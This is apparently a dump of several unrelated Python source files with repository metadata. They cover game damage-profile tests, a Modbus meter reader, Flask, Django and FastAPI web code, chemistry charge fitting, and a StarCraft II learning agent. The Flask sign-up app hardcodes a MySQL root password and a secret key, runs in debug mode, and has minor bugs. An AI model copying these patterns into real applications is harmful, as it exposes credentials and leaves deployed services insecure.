] | 2 | 2020-06-25T17:19:05.000Z | 2020-10-13T06:08:39.000Z | tests/fire_groups/test_damage_profile.py | spascou/ps2-analysis | 00f99b009d15d4c401a3338ddd0408ac7eedcc0b | [
"MIT"
] | null | null | null | tests/fire_groups/test_damage_profile.py | spascou/ps2-analysis | 00f99b009d15d4c401a3338ddd0408ac7eedcc0b | [
"MIT"
] | null | null | null | from ps2_census.enums import ResistType
from ps2_analysis.enums import DamageTargetType
from ps2_analysis.fire_groups.damage_profile import DamageLocation, DamageProfile
def test_damage_delta():
dp: DamageProfile = DamageProfile(
max_damage=100,
max_damage_range=1234,
min_damage=100,
min_damage_range=5678,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_delta == 0
dp: DamageProfile = DamageProfile(
max_damage=100,
max_damage_range=1234,
min_damage=90,
min_damage_range=5678,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_delta == 10
def test_damage_range_delta():
dp: DamageProfile = DamageProfile(
max_damage=5678,
max_damage_range=0,
min_damage=1234,
min_damage_range=0,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_range_delta == 0
dp: DamageProfile = DamageProfile(
max_damage=5678,
max_damage_range=10,
min_damage=1234,
min_damage_range=100,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_range_delta == 90
def test_damage_per_pellet():
dp: DamageProfile = DamageProfile(
max_damage=100,
max_damage_range=0,
min_damage=100,
min_damage_range=0,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_per_pellet(0) == 100
assert dp.damage_per_pellet(10) == 100
assert dp.damage_per_pellet(1000) == 100
assert (
dp.damage_per_pellet(0, damage_target_type=DamageTargetType.INFANTRY_NANOWEAVE)
== 80
)
dp: DamageProfile = DamageProfile(
max_damage=90,
max_damage_range=10,
min_damage=10,
min_damage_range=20,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_per_pellet(0) == 90
assert dp.damage_per_pellet(10) == 90
assert dp.damage_per_pellet(15) == 50
assert dp.damage_per_pellet(20) == 10
assert dp.damage_per_pellet(30) == 10
dp: DamageProfile = DamageProfile(
max_damage=90,
max_damage_range=10,
min_damage=10,
min_damage_range=20,
location_multiplier={DamageLocation.HEAD: 2.0},
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_per_pellet(0, damage_location=DamageLocation.HEAD) == 180
assert dp.damage_per_pellet(10, damage_location=DamageLocation.HEAD) == 180
assert dp.damage_per_pellet(15, damage_location=DamageLocation.HEAD) == 100
assert dp.damage_per_pellet(20, damage_location=DamageLocation.HEAD) == 20
assert dp.damage_per_pellet(30, damage_location=DamageLocation.HEAD) == 20
assert dp.damage_per_pellet(0, damage_location=DamageLocation.LEGS) == 90
assert dp.damage_per_pellet(10, damage_location=DamageLocation.LEGS) == 90
assert dp.damage_per_pellet(15, damage_location=DamageLocation.LEGS) == 50
assert dp.damage_per_pellet(20, damage_location=DamageLocation.LEGS) == 10
assert dp.damage_per_pellet(30, damage_location=DamageLocation.LEGS) == 10
def test_damage_per_shot():
dp: DamageProfile = DamageProfile(
max_damage=1500,
max_damage_range=100,
min_damage=500,
min_damage_range=200,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_per_shot(0) == 1500
assert (
dp.damage_per_shot(0, damage_target_type=DamageTargetType.INFANTRY_NANOWEAVE)
== 1200
)
assert dp.damage_per_shot(100) == 1500
assert dp.damage_per_shot(150) == 1000
assert dp.damage_per_shot(200) == 500
assert dp.damage_per_shot(300) == 500
dp: DamageProfile = DamageProfile(
max_damage=100,
max_damage_range=0,
min_damage=100,
min_damage_range=0,
pellets_count=4,
resist_type=ResistType.SMALL_ARM,
)
assert dp.damage_per_shot(0) == 4 * dp.damage_per_pellet(0)
def test_shots_to_kill():
dp: DamageProfile = DamageProfile(
max_damage=1500,
max_damage_range=200,
min_damage=500,
min_damage_range=400,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.shots_to_kill(0) == 1
assert dp.shots_to_kill(200) == 1
assert dp.shots_to_kill(300.1) == 2
assert dp.shots_to_kill(400) == 2
assert dp.shots_to_kill(500) == 2
dp: DamageProfile = DamageProfile(
max_damage=500,
max_damage_range=10,
min_damage=100,
min_damage_range=20,
location_multiplier={DamageLocation.HEAD: 2.0},
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.shots_to_kill(0) == 2
assert dp.shots_to_kill(0, damage_location=DamageLocation.HEAD) == 1
assert dp.shots_to_kill(30) == 10
assert dp.shots_to_kill(30, damage_location=DamageLocation.HEAD) == 5
dp: DamageProfile = DamageProfile(
max_damage=0,
max_damage_range=10,
min_damage=0,
min_damage_range=20,
location_multiplier={DamageLocation.HEAD: 2.0},
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert dp.shots_to_kill(0) == -1
assert dp.shots_to_kill(30) == -1
def test_shots_to_kill_ranges():
dp: DamageProfile = DamageProfile(
max_damage=1500,
max_damage_range=0,
min_damage=1000,
min_damage_range=0,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert list(dp.shots_to_kill_ranges()) == [(0.0, 1)]
dp: DamageProfile = DamageProfile(
max_damage=1500,
max_damage_range=100,
min_damage=500,
min_damage_range=200,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert list(dp.shots_to_kill_ranges()) == [(0.0, 1), (150.0, 2)]
dp: DamageProfile = DamageProfile(
max_damage=1500,
max_damage_range=100,
min_damage=1500,
min_damage_range=200,
pellets_count=1,
resist_type=ResistType.SMALL_ARM,
)
assert list(dp.shots_to_kill_ranges()) == [(0.0, 1)]
| 29.087963 | 87 | 0.665287 |
3aba7ed065768797a2e46990d868b26246bb0ccc | 5,418 | py | Python | EM6436_singlephasemode.py | saishibu/EM6400_Modbus_RPi | 9025d159d84407b92275208b874c140f86f1d306 | [
"MIT"
] | 2 | 2021-09-15T11:14:18.000Z | 2021-09-19T23:40:09.000Z | EM6436_singlephasemode.py | saishibu/EM6400_Modbus_RPi | 9025d159d84407b92275208b874c140f86f1d306 | [
"MIT"
] | null | null | null | EM6436_singlephasemode.py | saishibu/EM6400_Modbus_RPi | 9025d159d84407b92275208b874c140f86f1d306 | [
"MIT"
] | 3 | 2017-09-23T05:28:21.000Z | 2019-12-26T01:29:17.000Z | #ModBUS Communication between Schneider EM6436 Meter and Raspberry Pi
#First beta version.
#The meter is set with the following settings
#Communication : (RS484 to RS232 to USB) - BaudRate = 19200, Parity = N, Stopbits = 1, Device ID=1 (Hardcode in meter)
#Electical Settings: APri:50, Asec: 5, VPri: 415, Vsec:415, SYS: SINGLE
#To use the meter in Single Phase mode, Some address has to be commented.
#This program was tested on RPi3 running Rasbian Jessie Pixel from Noobs V2
#Debian Kernel = Linux raspberrypi 4.4.38-v7+ #938 SMP Thu Dec 15 15:22:21 GMT 2016 armv7l GNU/Linux
#Additional Packages: pymodbus,pyserial. (available in pyPi repo)
#V1.0b Feb2,2017
#Code by Sai Shibu (AWNA/058/15)
#Copyrights AmritaWNA Smartgrid Tag
import time
import pymodbus
import serial
from pymodbus.pdu import ModbusRequest
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
from pymodbus.transaction import ModbusRtuFramer
#Diagnosis messages not requires.
#from pymodbus.diag_message import *
#from pymodbus.file_message import *
#from pymodbus.other_message import *
#from pymodbus.mei_message import *
#Endian library for decoding HEX to Float
from pymodbus.constants import Endian
from pymodbus.payload import BinaryPayloadDecoder as decode
from pymodbus.payload import BinaryPayloadBuilder as builder
#logging not required.
#import logging
#logging.basicConfig()
#log=logging.getLogger()
#log.setLevel(logging.DEBUG)
#EM6436 is defined as client
client = ModbusClient(method ='rtu',port='/dev/ttyUSB0',timeout=0.05)
client.connect()
while 1:
####################################################
#Read Whole Block (Bugs while decoding with Endian!!!)
# T_RMS=client.read_holding_registers(0xbb8,20,unit=1)
# R_RMS=client.read_holding_registers(0xbd6,20,unit=1) #Total R Phase RMS Block
# Y_RMS=client.read_holding_registers(0xbd6,20,unit=1) #Total Y Phase RMS Block
# B_RMS=client.read_holding_registers(0xbd6,20,unit=1) #Total B Phase RMS Block
#####################################################
#Current Values
A=client.read_holding_registers(3912,2,unit=1)
A_d = decode.fromRegisters(A.registers, endian=Endian.Little)
A_d ={'float':A_d.decode_32bit_float(),}
#####################################################
#Voltage Values
VLN=client.read_holding_registers(3910,2,unit=1)
VLN_d = decode.fromRegisters(VLN.registers, endian=Endian.Little)
VLN_d ={'float':VLN_d.decode_32bit_float(),}
######################################################
#Power Values
#NOTE: EM6436 does not give VAR Values!!!
W=client.read_holding_registers(3902,2,unit=1)
VA=client.read_holding_registers(3900,2,unit=1)
W_d = decode.fromRegisters(W.registers, endian=Endian.Little)
W_d ={'float':W_d.decode_32bit_float(),}
VA_d = decode.fromRegisters(VA.registers, endian=Endian.Little)
VA_d ={'float':VA_d.decode_32bit_float(),}
######################################################
#Power Factor Values
PF=client.read_holding_registers(3906,2,unit=1)
PF_d = decode.fromRegisters(PF.registers, endian=Endian.Little)
PF_d ={'float':PF_d.decode_32bit_float(),}
######################################################
#Frequency Value
F=client.read_holding_registers(3914,2,unit=1)
F_d = decode.fromRegisters(F.registers, endian=Endian.Little)
F_d ={'float':F_d.decode_32bit_float(),}
######################################################
#Energy Value
VAH=client.read_holding_registers(3958,2,unit=1)
WH=client.read_holding_registers(3960,2,unit=1)
VAH_d = decode.fromRegisters(VAH.registers, endian=Endian.Little)
VAH_d ={'float':VAH_d.decode_32bit_float(),}
WH_d = decode.fromRegisters(WH.registers, endian=Endian.Little)
WH_d ={'float':WH_d.decode_32bit_float(),}
######################################################
#Power Interruptions count
intr=client.read_holding_registers(3998,2,unit=1)
intr_d = decode.fromRegisters(intr.registers, endian=Endian.Little)
intr_d ={'16uint':intr_d.decode_16bit_uint(),}
######################################################
print "-" * 100
timestamp = time.strftime('%H:%M:%S %d-%m-%Y')
print timestamp
print "Current Values"
for i, value in A_d.iteritems():
print value
A=value
print "-" * 100
print "Voltage Values"
for i, value in VLN_d.iteritems():
print value
VLN=value
print "-" * 100
print "Power Factor Values"
for i, value in PF_d.iteritems():
print value
PF=value
print "-" * 100
print "Frequency Value"
for i, value in F_d.iteritems():
print value
F=value
print "-" * 100
print "Power Values"
for i, value in W_d.iteritems():
print value
W=value
for i, value in VA_d.iteritems():
print value
VA=value
print "-" * 100
print "Energy Value"
for i, value in VAH_d.iteritems():
print value
VAH=value
for i, value in WH_d.iteritems():
print value
WH=value
print "-" * 100
print "interruption"
for i, value in intr_d.iteritems():
print value
intr=value
print "-" * 100
client.close()
| 30.1 | 118 | 0.622924 |
3abaf7778575fb33671c68f93238545045ace437 | 2,350 | py | Python | webapp.py | eyan02/WebApp | 4df02491dc6c27985e39c9d003eca1e662740000 | [
"MIT"
] | null | null | null | webapp.py | eyan02/WebApp | 4df02491dc6c27985e39c9d003eca1e662740000 | [
"MIT"
] | null | null | null | webapp.py | eyan02/WebApp | 4df02491dc6c27985e39c9d003eca1e662740000 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, json, request, redirect, session, jsonify
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash, check_password_hash
mysql = MySQL()
app = Flask(__name__)
# randomly generated encryption & decryption key, ensures security of a communications session
app.secret_key = "captain knuckles?"
# MySQL configurations
app.config["MYSQL_DATABASE_USER"] = "root"
app.config["MYSQL_DATABASE_PASSWORD"] = "ohgodwhyisthis!"
app.config["MYSQL_DATABASE_DB"] = "milestone"
app.config["MYSQL_DATABASE_HOST"] = "localhost"
mysql.init_app(app)
# ==============================================================================
@app.route("/")
def main():
return render_template("index.html")
@app.route("/signUp")
def showSignUp():
return render_template("signUp.html")
# ==============================================================================
# SIGN UP
@app.route("/signUp",methods=["POST","GET"])
def signUp():
try:
_name = request.form["inputName"]
_email = request.form["inputEmail"]
_password = request.form["inputPassword"]
# validates input values
if _name and _email and _password:
conn = mysql.connect()
cursor = conn.cursor()
_hashed_password = generate_password_hash(_password)
cursor.callproc("sp_createUser",(_name,_email,_hashed_password))
data = cursor.fetchall()
if len(data) is 0:
conn.commit()
return jsonify({"message":"User created successfully !"})
else:
return jsonify({"error":"User already exists !"})
else:
return jsonify({"error":"Enter all required fields"})
except Exception as e:
return jsonify({"error":str(e)})
finally:
cursor.close()
conn.close()
# ==============================================================================
# ==============================================================================
# ==============================================================================
# =====================================================
# FOR REALTIME DEBUGGING AND UPDATE WITHOUT APP RESTART
if __name__ == "__main__":
app.run(port=5002, debug=True)
# =====================================================
| 35.074627 | 94 | 0.514043 |
3ac0403526cc926b39bbe5158b35b86efdd85742 | 1,359 | py | Python | core/models.py | RafaelAparecidoSilva/Projeto_Django_DIO | 430b0166b39bc74f895805e51b1332c9184eccad | [
"MIT"
] | null | null | null | core/models.py | RafaelAparecidoSilva/Projeto_Django_DIO | 430b0166b39bc74f895805e51b1332c9184eccad | [
"MIT"
] | null | null | null | core/models.py | RafaelAparecidoSilva/Projeto_Django_DIO | 430b0166b39bc74f895805e51b1332c9184eccad | [
"MIT"
] | null | null | null | from django.db import models
# Importamos o User do sistema para utilizar os dados dos usuários que registramos no admin do django
# (desta forma não precisamos criar uma tabela específica no models para representar os usuários).
from django.contrib.auth.models import User
from datetime import datetime
class Evento(models.Model):
titulo = models.CharField(max_length=100, verbose_name='Título')
descricao = models.TextField(blank=True, null=True)
data_evento = models.DateTimeField(verbose_name='Data do Evento')
data_criacao = models.DateTimeField(auto_now=True, verbose_name='Data de Criação')
usuario = models.ForeignKey(User, on_delete=models.CASCADE) # CASCADE -> caso USER deletado, tudo dele será deletado do sistema.
class Meta:
db_table = 'evento' # Configurando o nome da tabela no banco de dados
# def __str__(self): # Tratando a apresentação do objeto
# return self.titulo
def get_data_evento(self): # Conseguimos colocar uma função no models para ser utilizado pelo objeto no html
return self.data_evento.strftime('%d/%m/%Y - %H:%Mh')
def get_data_input_evento(self):
return self.data_evento.strftime('%Y-%m-%dT%H:%M')
def get_evento_atrasado(self):
if self.data_evento < datetime.now():
return True
else:
return False
| 41.181818 | 132 | 0.717439 |
3ac1c768c158dc838dfae0e6094464208e94f0f5 | 434 | py | Python | feature_generation/normalize/rolling_mean.py | s0lvang/ideal-pancake | f7a55f622b02b03a987d74cfdff1c51288bfb657 | [
"MIT"
] | 6 | 2020-09-22T06:54:51.000Z | 2021-03-25T05:38:05.000Z | feature_generation/normalize/rolling_mean.py | s0lvang/ideal-pancake | f7a55f622b02b03a987d74cfdff1c51288bfb657 | [
"MIT"
] | 12 | 2020-09-21T13:20:49.000Z | 2021-04-07T08:01:12.000Z | feature_generation/normalize/rolling_mean.py | s0lvang/ideal-pancake | f7a55f622b02b03a987d74cfdff1c51288bfb657 | [
"MIT"
] | null | null | null | def rolling_mean(data):
return [take_rolling_mean(df) for df in data]
def take_rolling_mean(df):
window = 20
columns_to_take_rolling_mean = [
"pupil_diameter",
"saccade_duration",
"duration",
"saccade_length",
]
for column in columns_to_take_rolling_mean:
df[f"{column}_rolling"] = df[column].rolling(window).mean()
# index < window is nan
return df.iloc[window:]
| 25.529412 | 67 | 0.645161 |
3ac339e728b9d10c187e2b092542a9efcdb4b687 | 2,264 | py | Python | backend/utils.py | wanghaiqing2015/fastapi-vue-cms | 0cd1f8e08ea2389287530d04872c7d5bfccdeb62 | [
"MIT"
] | 7 | 2020-08-07T23:51:57.000Z | 2022-02-12T05:13:18.000Z | backend/utils.py | wanghaiqing2015/fastapi-vue-cms | 0cd1f8e08ea2389287530d04872c7d5bfccdeb62 | [
"MIT"
] | 2 | 2020-04-12T16:50:55.000Z | 2020-08-08T06:04:00.000Z | backend/utils.py | hjlarry/fastapi-vue-cms | 4157b2064ce77e35fc280573a2198cbc9a5db9b4 | [
"MIT"
] | null | null | null | import json
from datetime import datetime, timedelta
from typing import Any
import jwt
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.status import HTTP_403_FORBIDDEN
from passlib.context import CryptContext
from fastapi import Depends, Security, HTTPException
from fastapi.security import OAuth2PasswordBearer
from sqlalchemy.orm import Session
from backend import crud, config
from backend.schemas import TokenPayload
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
reusable_oauth2 = OAuth2PasswordBearer(tokenUrl="/api/v1/login/access-token")
def verify_password(plain_password: str, hashed_password: str):
return pwd_context.verify(plain_password, hashed_password)
def get_password_hash(password: str):
return pwd_context.hash(password)
def get_db(request: Request):
return request.state.db
def get_current_user(
db: Session = Depends(get_db), token: str = Security(reusable_oauth2)
):
try:
payload = jwt.decode(token, config.SECRET_KEY, algorithms=[ALGORITHM])
token_data = TokenPayload(**payload)
except jwt.PyJWTError:
raise HTTPException(
status_code=HTTP_403_FORBIDDEN, detail="Could not validate credentials"
)
user = crud.user.get(db, id=token_data.user_id)
if not user:
raise HTTPException(status_code=404, detail="User not found")
return user
ALGORITHM = "HS256"
access_token_jwt_subject = "access"
def create_access_token(*, data: dict, expires_delta: timedelta = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=15)
to_encode.update({"exp": expire, "sub": access_token_jwt_subject})
encoded_jwt = jwt.encode(to_encode, config.SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
class MyResponse(JSONResponse):
def render(self, content: Any) -> bytes:
my_content = {
"code": 0,
"data": content,
}
return json.dumps(
my_content,
ensure_ascii=False,
allow_nan=False,
indent=None,
separators=(",", ":"),
).encode("utf-8")
| 29.402597 | 83 | 0.706714 |
3ac4d21f2d05e601832ebe89aa297f1bde8e8600 | 2,577 | py | Python | tests/test_ex1.py | loriab/resp_gm | 36974ca2caf262ef40bf7a9586c12d65e0a29be5 | [
"BSD-3-Clause"
] | null | null | null | tests/test_ex1.py | loriab/resp_gm | 36974ca2caf262ef40bf7a9586c12d65e0a29be5 | [
"BSD-3-Clause"
] | 1 | 2019-01-15T20:33:32.000Z | 2019-01-15T20:33:32.000Z | tests/test_ex1.py | loriab/resp_gm | 36974ca2caf262ef40bf7a9586c12d65e0a29be5 | [
"BSD-3-Clause"
] | null | null | null | def test_ex1():
import psi4
import numpy as np
import resp
# Initialize molecule
mol = psi4.geometry(""" C 1.45051389 -0.06628932 0.00000000
H 1.75521613 -0.62865986 -0.87500146
H 1.75521613 -0.62865986 0.87500146
H 1.92173244 0.90485897 0.00000000
C -0.04233122 0.09849378 0.00000000
O -0.67064817 -1.07620915 0.00000000
H -1.60837259 -0.91016601 0.00000000
O -0.62675864 1.13160510 0.00000000""")
mol.update_geometry()
# Specify options
options = {'N_VDW_LAYERS' : 4,
'VDW_SCALE_FACTOR' : 1.4,
'VDW_INCREMENT' : 0.2,
'VDW_POINT_DENSITY' : 1.0,
'resp_a' : 0.0005,
'RESP_B' : 0.1,
}
# Call for first stage fit
charges1 = resp.resp([mol], [options])
print('Electrostatic Potential Charges')
print(charges1[0][0])
print('Restrained Electrostatic Potential Charges')
print(charges1[0][1])
# Reference charges are generated by the R.E.D.-III.5 tools
# with GAMESS as the quantum chemistry package
reference_charges1 = np.array([-0.294974, 0.107114, 0.107114, 0.084795,
0.803999, -0.661279, 0.453270, -0.600039])
print('Reference RESP Charges')
print(reference_charges1)
print('Difference')
print(charges1[0][1]-reference_charges1)
assert np.allclose(charges1[0][1], reference_charges1, atol=5e-4)
# Change the value of the RESP parameter A
options['resp_a'] = 0.001
# Add constraint for atoms fixed in second stage fit
constraint_charge = []
for i in range(4, 8):
constraint_charge.append([charges1[0][1][i], [i+1]])
options['constraint_charge'] = constraint_charge
options['constraint_group'] = [[2, 3, 4]]
options['grid'] = '1_%s_grid.dat' %mol.name()
options['esp'] = '1_%s_grid_esp.dat' %mol.name()
mol.set_name('stage2')
# Call for second stage fit
charges2 = resp.resp([mol], [options])
# Get RESP charges
print("\nStage Two:\n")
print('RESP Charges')
print(charges2[0][1])
reference_charges2 = np.array([-0.290893, 0.098314, 0.098314, 0.098314,
0.803999, -0.661279, 0.453270, -0.600039])
print('Reference RESP Charges')
print(reference_charges2)
print('Difference')
print(charges2[0][1]-reference_charges2)
assert np.allclose(charges2[0][1], reference_charges2, atol=5e-4)
| 36.295775 | 79 | 0.593326 |
3ac6b31791c0cfaed3de6874a765f1f48fec4c3e | 741 | py | Python | tunobase/social_media/facebook/utils.py | unomena/tunobase | 9219e6c5a49eecd1c66dd1b518640c5d678acab6 | [
"BSD-3-Clause"
] | null | null | null | tunobase/social_media/facebook/utils.py | unomena/tunobase | 9219e6c5a49eecd1c66dd1b518640c5d678acab6 | [
"BSD-3-Clause"
] | null | null | null | tunobase/social_media/facebook/utils.py | unomena/tunobase | 9219e6c5a49eecd1c66dd1b518640c5d678acab6 | [
"BSD-3-Clause"
] | null | null | null | '''
Created on 09 Nov 2013
@author: michael
'''
import json
import urllib2
import urllib
from django.conf import settings
import facebook
def validate_access_token(access_token):
'''
Validate a Facebook access token
'''
# Get an app access token
app_token = facebook.get_app_access_token(
settings.FACEBOOK_APP_ID,
settings.FACEBOOK_APP_SECRET
)
args = {
'input_token': access_token,
'access_token': app_token
}
file = urllib2.urlopen(
"https://graph.facebook.com/debug_token?" + urllib.urlencode(args)
)
try:
result = json.loads(file.read())
finally:
file.close()
return result['data']['is_valid'], result['data']['user_id']
| 19.5 | 74 | 0.645074 |
3ac803ff9e5c1fc42b5e6459752425d80c4ba39a | 2,776 | py | Python | src/list_ideas.py | lxk1170/ideas-with-emotion | 89f5322189faca0ba2c00de8a87168ab54f2caa0 | [
"MIT"
] | null | null | null | src/list_ideas.py | lxk1170/ideas-with-emotion | 89f5322189faca0ba2c00de8a87168ab54f2caa0 | [
"MIT"
] | null | null | null | src/list_ideas.py | lxk1170/ideas-with-emotion | 89f5322189faca0ba2c00de8a87168ab54f2caa0 | [
"MIT"
] | null | null | null | import db
from pen import Pen
from idea import Idea
MIN_ENJOYMENT = 0.5
MIN_RELEVANT = 2
MAX_DEPTH = 3
MIN_ACCEPTABLE_SCORE = 0.5
def list_ideas(pen):
ideas = db.load_all_ideas()
# double link all relevant ideas
for name, data in ideas.items():
for other_name, other_data in ideas.items():
if name != other_name:
if name in other_data['relevant'] and other_name not in data['relevant']:
data['relevant'].append(other_name)
# convert ideas into actual idea objects
# TODO do this earlier on
proper_ideas = []
for name, data in ideas.items():
idea = Idea(name, data['version'] if 'version' in data else 0)
idea.add_emotion(*data['emotions'])
idea.add_enjoyment(**data['enjoyments'])
proper_ideas.append(idea)
# sort the ideas by their average scores
proper_ideas = sorted(proper_ideas, key=lambda idea: idea.avg_enjoyment())
proper_ideas.reverse()
# calculate average scores
for idea in proper_ideas:
# NOTE this is a tad confusing; there currently exist two data scructures for idea
(total, count, relatives) = total_score(ideas, idea.name, [])
individual_score = round(idea.avg_enjoyment() * 10.0) / 10
# display the averages
pen.write(f"[{individual_score}] {idea}")
pen.down()
# score each of the ideas by evaluating neighbors
def total_score(ideas, name, visited = [], depth = MAX_DEPTH):
if name in visited or depth <= 0:
return ({}, 0, [])
visited.append(name)
data = ideas[name]
total_count = 1
# start with current node score
total_enjoyments = {}
for key, val in data['enjoyments'].items():
total_enjoyments[key] = int(val)
# add self as good if the score is acceptable
good_relatives = [name] if avg_score(data['enjoyments']) > MIN_ACCEPTABLE_SCORE else []
# add sister node scores
for child in data['relevant']:
(enjoyment_scores, count, relatives) = total_score(ideas, child, visited, depth - 1)
total_count += count
good_relatives += relatives
# add the scores
for key in enjoyment_scores:
enjoyment_value = int(enjoyment_scores[key])
if key in total_enjoyments:
total_enjoyments[key] += enjoyment_value
else:
total_enjoyments[key] = enjoyment_value
return (total_enjoyments, total_count, good_relatives)
def avg_score(enjoyments, count = 1):
if len(enjoyments) == 0 or count == 0:
return 0
total = 0.0
for val in enjoyments.values():
total += int(val)
return (total / len(enjoyments)) / count
if __name__ == '__main__':
list_ideas(Pen())
| 31.908046 | 92 | 0.636527 |
3acea141522edbabbe9dcfc8fdb02306077a23f4 | 6,988 | py | Python | pysc2/agents/myAgent/myAgent_6/decisionMaker/hierarchical_learning_structure.py | Hotpotfish/pysc2 | 3d7f7ffc01a50ab69d435b65c892cd0bc11265a8 | [
"Apache-2.0"
] | null | null | null | pysc2/agents/myAgent/myAgent_6/decisionMaker/hierarchical_learning_structure.py | Hotpotfish/pysc2 | 3d7f7ffc01a50ab69d435b65c892cd0bc11265a8 | [
"Apache-2.0"
] | null | null | null | pysc2/agents/myAgent/myAgent_6/decisionMaker/hierarchical_learning_structure.py | Hotpotfish/pysc2 | 3d7f7ffc01a50ab69d435b65c892cd0bc11265a8 | [
"Apache-2.0"
] | null | null | null | import datetime
import pysc2.agents.myAgent.myAgent_6.config.config as config
from pysc2.agents.myAgent.myAgent_6.decisionMaker.DQN import DQN
import pysc2.agents.myAgent.myAgent_6.smart_actions as sa
import pysc2.agents.myAgent.myAgent_6.tools.handcraft_function as handcraft_function
from pysc2.env.environment import StepType
from pysc2.lib import actions
class decision_maker():
def __init__(self, network):
self.network = network
self.previous_state = None
self.previous_action = None
self.previous_reward = None
self.current_state = None
self.load_and_train = True
class hierarchical_learning_structure():
def __init__(self):
self.episode = -1
self.begin_time = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
self.DataShape = (None, config.MAP_SIZE, config.MAP_SIZE, 39)
self.top_decision_maker = decision_maker(
DQN(config.MU, config.SIGMA, config.LEARING_RATE, len(sa.controllers), 0, self.DataShape, 'top_decision_maker'))
self.controllers = []
for i in range(len(sa.controllers)):
# 5代表增加的参数槽 6个槽分别代表动作编号,RAW_TYPES.queued, RAW_TYPES.unit_tags, RAW_TYPES.target_unit_tag 和RAW_TYPES.world(占两位)
self.controllers.append(
decision_maker(DQN(config.MU, config.SIGMA, config.LEARING_RATE, len(sa.controllers[i]), 5, self.DataShape, 'controller' + str(i))))
def top_decision_maker_train_model(self, obs, modelLoadPath):
# 数据是否记录
if self.top_decision_maker.previous_action is not None:
self.top_decision_maker.network.perceive(self.top_decision_maker.previous_state,
self.top_decision_maker.previous_action,
self.top_decision_maker.previous_reward,
self.top_decision_maker.current_state,
obs.last())
# 是否为继续训练模式
if modelLoadPath is not None and self.top_decision_maker.load_and_train is True:
self.top_decision_maker.load_and_train = False
self.top_decision_maker.network.restoreModel(modelLoadPath)
print('top')
controller_number = self.top_decision_maker.network.egreedy_action(self.top_decision_maker.current_state)
self.top_decision_maker.previous_reward = obs.reward
self.top_decision_maker.previous_state = self.top_decision_maker.current_state
self.top_decision_maker.previous_action = controller_number
return controller_number
def top_decision_maker_test_model(self, modelLoadPath):
return self.top_decision_maker.network.action(self.top_decision_maker.current_state, modelLoadPath)
def choose_controller(self, obs, mark, modelLoadPath):
self.top_decision_maker.current_state = handcraft_function.get_all_observation(obs)
if mark == 'TRAIN':
controller_number = self.top_decision_maker_train_model(obs, modelLoadPath)
return controller_number
elif mark == 'TEST':
controller_number = self.top_decision_maker_test_model(modelLoadPath)
return controller_number
def controller_train_model(self, obs, controller_number, modelLoadPath):
if self.controllers[controller_number].previous_action is not None:
self.controllers[controller_number].network.perceive(self.controllers[controller_number].previous_state,
self.controllers[controller_number].previous_action,
self.controllers[controller_number].previous_reward,
self.controllers[controller_number].current_state,
obs.last())
if modelLoadPath is not None and self.controllers[controller_number].load_and_train is True:
self.controllers[controller_number].load_and_train = False
self.top_decision_maker.network.restoreModel(modelLoadPath)
print('con' + str(controller_number))
action_and_parameter = self.controllers[controller_number].network.egreedy_action(self.controllers[controller_number].current_state)
self.controllers[controller_number].previous_reward = obs.reward
self.controllers[controller_number].previous_state = self.controllers[controller_number].current_state
self.controllers[controller_number].previous_action = action_and_parameter
action_and_parameter = handcraft_function.reflect(obs, action_and_parameter)
action = handcraft_function.assembly_action(obs, controller_number, action_and_parameter)
return action
def controller_test_model(self, obs, controller_number, modelLoadPath):
state = self.controllers[controller_number].current_state
action_and_parameter = self.controllers[controller_number].network.action(state, modelLoadPath)
macro_and_parameter = handcraft_function.reflect(obs, action_and_parameter)
action = handcraft_function.assembly_action(obs, controller_number, macro_and_parameter)
return action
def choose_macro(self, obs, controller_number, mark, modelLoadPath):
self.controllers[controller_number].current_state = handcraft_function.get_all_observation(obs)
if mark == 'TRAIN':
action = self.controller_train_model(obs, controller_number, modelLoadPath)
return action
elif mark == 'TEST':
action = self.controller_test_model(obs, controller_number, modelLoadPath)
return action
def get_save_and_loadPath(self, mark, modelSavePath, modelLoadPath):
self.episode += 1
time = str(self.begin_time)
if mark == 'TRAIN':
self.modelSavePath = modelSavePath + '/' + time + '/'
self.modelLoadPath = modelLoadPath
def train_all_neural_network(self):
self.top_decision_maker.network.train_Q_network(self.modelSavePath, self.episode)
for i in range(len(sa.controllers)):
self.controllers[i].network.train_Q_network(self.modelSavePath, self.episode)
def make_choice(self, obs, mark, modelSavePath, modelLoadPath):
if obs[0] == StepType.FIRST:
# 更新读取和保存路径
self.get_save_and_loadPath(mark, modelSavePath, modelLoadPath)
return actions.RAW_FUNCTIONS.raw_move_camera((config.MAP_SIZE / 2, config.MAP_SIZE / 2))
elif obs[0] == StepType.LAST and mark == 'TRAIN':
self.train_all_neural_network()
else:
controller_number = int(self.choose_controller(obs, mark, self.modelLoadPath)[0])
action = self.choose_macro(obs, controller_number, mark, self.modelLoadPath)
print(action)
return action
| 50.637681 | 148 | 0.680309 |
3acee6b394ee9cc776b0a34e348bdc806db4720e | 2,064 | py | Python | brudnopis.py | Shandelier/py-tf-movenet-fork | f3eb866665f9e23ec313edf68df6302dd5786ed6 | [
"Apache-2.0"
